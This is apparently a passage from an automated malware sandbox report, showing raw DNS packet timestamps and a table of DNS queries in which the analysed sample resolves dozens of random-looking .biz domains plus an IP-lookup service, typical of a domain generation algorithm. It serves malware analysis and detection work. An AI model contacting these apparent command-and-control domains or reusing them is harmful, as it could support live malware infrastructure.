                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.092335939 CEST53572011.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.584666967 CEST6020753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.678770065 CEST53602071.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.942850113 CEST5246653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.950445890 CEST53524661.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:51.425131083 CEST6296453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:51.432939053 CEST53629641.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:52.073003054 CEST5779753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:52.081075907 CEST53577971.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:52.279267073 CEST6384353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:52.286775112 CEST53638431.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:53.115287066 CEST6001453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:53.123126030 CEST53600141.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:53.126297951 CEST6223653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:53.255410910 CEST6223653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:53.343812943 CEST53622361.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:53.343839884 CEST53622361.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:53.486633062 CEST6455053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:53.508049965 CEST6455053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:53.596824884 CEST53645501.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:53.597018003 CEST53645501.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:54.093257904 CEST6116553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:54.100629091 CEST53611651.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:54.854765892 CEST6057753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:54.862147093 CEST53605771.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:55.031408072 CEST5270253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:55.038822889 CEST53527021.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:55.632373095 CEST5845353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:55.640398026 CEST53584531.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.133444071 CEST6091153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.141946077 CEST53609111.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.514288902 CEST5937853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.521702051 CEST53593781.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.958306074 CEST5433853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.965785027 CEST53543381.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:57.712210894 CEST5919753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:57.720726967 CEST53591971.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:58.292406082 CEST5176953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:58.299818039 CEST53517691.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:58.365560055 CEST6550653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:58.383003950 CEST6550653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:58.390022039 CEST53655061.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:58.628931046 CEST53655061.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:59.640188932 CEST6251453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:59.647563934 CEST53625141.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:00.397409916 CEST4996953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:00.405123949 CEST53499691.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:00.482611895 CEST5169153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:00.490252018 CEST53516911.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:01.297976971 CEST6340753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:01.305067062 CEST53634071.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:01.846045971 CEST5108053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:01.853338957 CEST53510801.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:02.219214916 CEST5115153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:02.226409912 CEST53511511.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:02.358275890 CEST5974453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:02.365505934 CEST53597441.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:02.862147093 CEST6052653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:02.870474100 CEST53605261.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:03.997092009 CEST5917353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:04.004905939 CEST53591731.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:04.565181971 CEST5670153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:04.573654890 CEST53567011.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:04.574513912 CEST6418653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:04.582066059 CEST53641861.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:05.117322922 CEST6455153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:05.125083923 CEST53645511.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:05.589631081 CEST5679653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:05.689766884 CEST5679653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:05.693413019 CEST6276053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:05.700743914 CEST53627601.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:05.771612883 CEST53567961.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:05.772023916 CEST53567961.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:07.361083031 CEST6214153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:07.368706942 CEST53621411.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:07.445163012 CEST5356753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:07.451927900 CEST53535671.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:08.747029066 CEST6057953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:08.754210949 CEST53605791.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:08.866389990 CEST5799453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:08.873372078 CEST53579941.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:09.124671936 CEST6355453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:09.132422924 CEST53635541.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:09.490029097 CEST5430853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:09.497543097 CEST53543081.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.097177029 CEST5272153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.103873968 CEST53527211.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.868161917 CEST6406953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.875994921 CEST53640691.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:11.011159897 CEST5161953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:11.019077063 CEST53516191.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:11.185734034 CEST4921453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:11.193454027 CEST53492141.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:11.383723021 CEST5777853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:11.392004013 CEST53577781.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.263416052 CEST6279853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.269483089 CEST5104353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.270463943 CEST53627981.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.276465893 CEST53510431.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.303419113 CEST4938053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.310811043 CEST53493801.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.341582060 CEST5448953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.348547935 CEST53544891.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.379683971 CEST5164653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.386734009 CEST53516461.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.432420969 CEST6508653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.440347910 CEST53650861.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.474070072 CEST6115953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.481398106 CEST53611591.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.487981081 CEST5567253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.495523930 CEST53556721.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.537816048 CEST5581153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.545144081 CEST53558111.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:13.284212112 CEST5650653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:13.291323900 CEST53565061.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:13.323402882 CEST6029353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:13.352051973 CEST6029353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:13.462415934 CEST53602931.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:13.462444067 CEST53602931.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:13.490817070 CEST4923653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:13.498116016 CEST53492361.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:13.944935083 CEST5750753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:13.952195883 CEST53575071.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:13.955447912 CEST5322653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:13.962832928 CEST53532261.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:14.373477936 CEST6466953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:14.380506039 CEST53646691.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:15.336637974 CEST6195653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:15.344424009 CEST53619561.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:15.378068924 CEST6532353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:15.385799885 CEST53653231.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:16.277139902 CEST6037853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:16.305124044 CEST6037853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:16.414088011 CEST53603781.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:16.414092064 CEST53603781.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:16.748071909 CEST5547753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:16.755819082 CEST53554771.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:17.469504118 CEST6536053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:17.476671934 CEST53653601.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:18.176702976 CEST6381353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:18.183769941 CEST53638131.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:19.484422922 CEST5689753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:19.492815971 CEST53568971.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:19.974982023 CEST5655953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:19.982605934 CEST53565591.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:20.240353107 CEST6130753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:20.248027086 CEST53613071.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:20.695300102 CEST5195653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:20.702675104 CEST53519561.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.108798981 CEST6187753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.120650053 CEST53618771.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.186536074 CEST5712353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.194258928 CEST53571231.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.958084106 CEST5674353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:21.976974010 CEST5674353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:22.171539068 CEST53567431.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:22.171607018 CEST53567431.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:25.400058985 CEST5486953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:25.406862974 CEST53548691.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:25.408684015 CEST5268553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:25.415685892 CEST53526851.1.1.1192.168.2.5

                                                                                                                                                                                                                                                                                                          DNS Queries

                                                                                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:23.342924118 CEST192.168.2.51.1.1.10x8063Standard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:23.601206064 CEST192.168.2.51.1.1.10x6b19Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:24.782464981 CEST192.168.2.51.1.1.10x8a94Standard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:24.969414949 CEST192.168.2.51.1.1.10x3311Standard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:26.768829107 CEST192.168.2.51.1.1.10xbcc0Standard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:26.772661924 CEST192.168.2.51.1.1.10xb66cStandard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:27.805931091 CEST192.168.2.51.1.1.10xad3aStandard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:27.853192091 CEST192.168.2.51.1.1.10xbd45Standard query (0)s82.gocheapweb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:28.173118114 CEST192.168.2.51.1.1.10x256dStandard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:28.326325893 CEST192.168.2.51.1.1.10xfaaStandard query (0)przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:29.108968019 CEST192.168.2.51.1.1.10x3b3aStandard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:29.531250000 CEST192.168.2.51.1.1.10x3833Standard query (0)zlenh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:29.544971943 CEST192.168.2.51.1.1.10xbfd3Standard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:30.046320915 CEST192.168.2.51.1.1.10x3fc2Standard query (0)przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:30.920808077 CEST192.168.2.51.1.1.10x457cStandard query (0)uhxqin.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:30.931174994 CEST192.168.2.51.1.1.10x5da3Standard query (0)anpmnmxo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:30.939405918 CEST192.168.2.51.1.1.10x94a4Standard query (0)lpuegx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:31.567168951 CEST192.168.2.51.1.1.10x2decStandard query (0)zlenh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:31.577907085 CEST192.168.2.51.1.1.10x99faStandard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:33.325433016 CEST192.168.2.51.1.1.10xaad4Standard query (0)uhxqin.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:33.333301067 CEST192.168.2.51.1.1.10x7c3fStandard query (0)anpmnmxo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:33.351183891 CEST192.168.2.51.1.1.10xa0f1Standard query (0)lpuegx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:45.791235924 CEST192.168.2.51.1.1.10x4376Standard query (0)lpuegx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:56.930687904 CEST192.168.2.51.1.1.10x6166Standard query (0)vjaxhpbji.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:01.023364067 CEST192.168.2.51.1.1.10xa845Standard query (0)vjaxhpbji.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:04.919292927 CEST192.168.2.51.1.1.10x69dStandard query (0)xlfhhhm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:06.411892891 CEST192.168.2.51.1.1.10x1222Standard query (0)ifsaia.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:08.041007996 CEST192.168.2.51.1.1.10xe39dStandard query (0)saytjshyf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:09.272866964 CEST192.168.2.51.1.1.10xf4ebStandard query (0)vcddkls.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:11.155543089 CEST192.168.2.51.1.1.10xb8d3Standard query (0)fwiwk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:12.695547104 CEST192.168.2.51.1.1.10x639bStandard query (0)tbjrpv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:13.679730892 CEST192.168.2.51.1.1.10x9409Standard query (0)deoci.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:14.666750908 CEST192.168.2.51.1.1.10x7233Standard query (0)gytujflc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:15.599189043 CEST192.168.2.51.1.1.10x573dStandard query (0)qaynky.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:18.709276915 CEST192.168.2.51.1.1.10x8c09Standard query (0)bumxkqgxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:19.538527012 CEST192.168.2.51.1.1.10x43dbStandard query (0)dwrqljrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:20.788475990 CEST192.168.2.51.1.1.10x1d8Standard query (0)nqwjmb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:22.400291920 CEST192.168.2.51.1.1.10xcdc9Standard query (0)ytctnunms.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:22.944672108 CEST192.168.2.51.1.1.10x1434Standard query (0)myups.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:24.992893934 CEST192.168.2.51.1.1.10x3441Standard query (0)oshhkdluh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:25.847407103 CEST192.168.2.51.1.1.10xc8cbStandard query (0)yunalwv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:26.999830961 CEST192.168.2.51.1.1.10x6247Standard query (0)jpskm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:28.120148897 CEST192.168.2.51.1.1.10x12f8Standard query (0)lrxdmhrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:29.046667099 CEST192.168.2.51.1.1.10x4df7Standard query (0)wllvnzb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:30.675142050 CEST192.168.2.51.1.1.10x80c4Standard query (0)gnqgo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:31.365513086 CEST192.168.2.51.1.1.10x7f9eStandard query (0)jhvzpcfg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:32.121469975 CEST192.168.2.51.1.1.10x6315Standard query (0)acwjcqqv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:33.731456041 CEST192.168.2.51.1.1.10x9f18Standard query (0)lejtdj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:33.739558935 CEST192.168.2.51.1.1.10x248eStandard query (0)vyome.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:34.535470963 CEST192.168.2.51.1.1.10xb58fStandard query (0)yauexmxk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:35.391563892 CEST192.168.2.51.1.1.10x48c6Standard query (0)iuzpxe.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:36.956198931 CEST192.168.2.51.1.1.10xab3dStandard query (0)sxmiywsfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:38.553425074 CEST192.168.2.51.1.1.10x66faStandard query (0)vrrazpdh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:39.701648951 CEST192.168.2.51.1.1.10x9ae0Standard query (0)ftxlah.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:41.325243950 CEST192.168.2.51.1.1.10xf74Standard query (0)typgfhb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:42.938456059 CEST192.168.2.51.1.1.10x72a9Standard query (0)esuzf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:43.884596109 CEST192.168.2.51.1.1.10x36efStandard query (0)xlfhhhm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:44.002825975 CEST192.168.2.51.1.1.10x57c7Standard query (0)gvijgjwkh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:44.771399021 CEST192.168.2.51.1.1.10x80b7Standard query (0)qpnczch.bizA (IP address)IN (0x0001)false
